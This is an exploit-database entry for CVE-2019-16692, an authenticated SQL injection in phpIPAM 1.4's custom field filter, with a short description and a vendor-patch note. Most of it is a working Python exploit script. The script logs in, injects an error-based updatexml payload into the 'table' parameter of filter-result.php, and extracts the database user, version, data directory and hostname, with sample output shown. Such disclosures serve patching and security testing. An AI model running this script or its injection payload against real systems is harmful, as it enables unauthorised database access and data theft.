phpIPAM Custom Field Filter SQL Injection

vendor:

phpIPAM

by:

Kevin Kirsche

9.8

CVSS

CRITICAL

SQL Injection

CWE

Product Name: phpIPAM

Affected Version From: 1.4

Affected Version To: 1.4

Patch Exists: YES

Related CWE: CVE-2019-16692

CPE: a:phpipam:phpipam:1.4

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Ubuntu 18.04 / MariaDB 10.4

2019

phpIPAM Custom Field Filter SQL Injection

This exploit allows an attacker to execute arbitrary SQL commands on the vulnerable phpIPAM application. The vulnerability exists in the custom field filter feature, which allows an attacker to inject malicious SQL code into the 'table' parameter of the 'filter-result.php' page. This can be exploited to execute arbitrary SQL commands on the underlying database.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of phpIPAM.

Source

Exploit-DB raw data:

#!/usr/bin/env python3
# Exploit Title: phpIPAM Custom Field Filter SQL Injection
# Exploit Announcement Date: September 16, 2019 5:18 AM
# Exploit Creation Date: September 27, 2019
# Exploit Author: Kevin Kirsche
# Vendor Homepage: https://phpipam.net
# Software Link: https://github.com/phpipam/phpipam/archive/1.4.tar.gz
# Version: 1.4
# Tested on: Ubuntu 18.04 / MariaDB 10.4
# Requires:
#   Python 3
#   requests package
# CVE: CVE-2019-16692

# For more details, view:
# https://github.com/phpipam/phpipam/issues/2738
# https://github.com/kkirsche/CVE-2019-16692

# Example Output
# [+] Executing select user()
# [*] Received: phpipam@172.18.0.4
# [+] Executing select system_user()
# [*] Received: phpipam@172.18.0.4
# [+] Executing select @@version
# [*] Received: .4.8-MariaDB-1:10.4.8+maria~b
# [+] Executing select @@datadir
# [*] Received: /var/lib/mysq
# [+] Executing select @@hostname
# [*] Received: ubuntu


from requests import Session

host = "localhost"
login_url = f"http://{host}/app/login/login_check.php"
exploit_url = f"http://{host}/app/admin/custom-fields/filter-result.php"

credentials = {
    "ipamusername": "Admin",
    "ipampassword": "Password",
}

payload = {
    "action": "add",
    "table": "",
}


cmds = {
    "unpriv": [
        "select user()",
        "select system_user()",
        "select @@version",
        "select @@datadir",
        "select @@hostname",
    ]
}

if __name__ == "__main__":
    client = Session()
    resp = client.post(login_url, data=credentials)
    if resp.status_code == 200:
        for cmd in cmds["unpriv"]:
            print(f"[+] Executing {cmd}")
            payload["table"] = f"users`where 1=(updatexml(1,concat(0x3a,({cmd})),1))#`"
            resp = client.post(exploit_url, data=payload)
            info = resp.text.lstrip("<div class='alert alert-danger'>SQLSTATE[HY000]: General error: 1105 XPATH syntax error: ':").rstrip("'</div><div class='alert alert-success'>Filter saved</div>")
            print(f"[*] Received: {info}")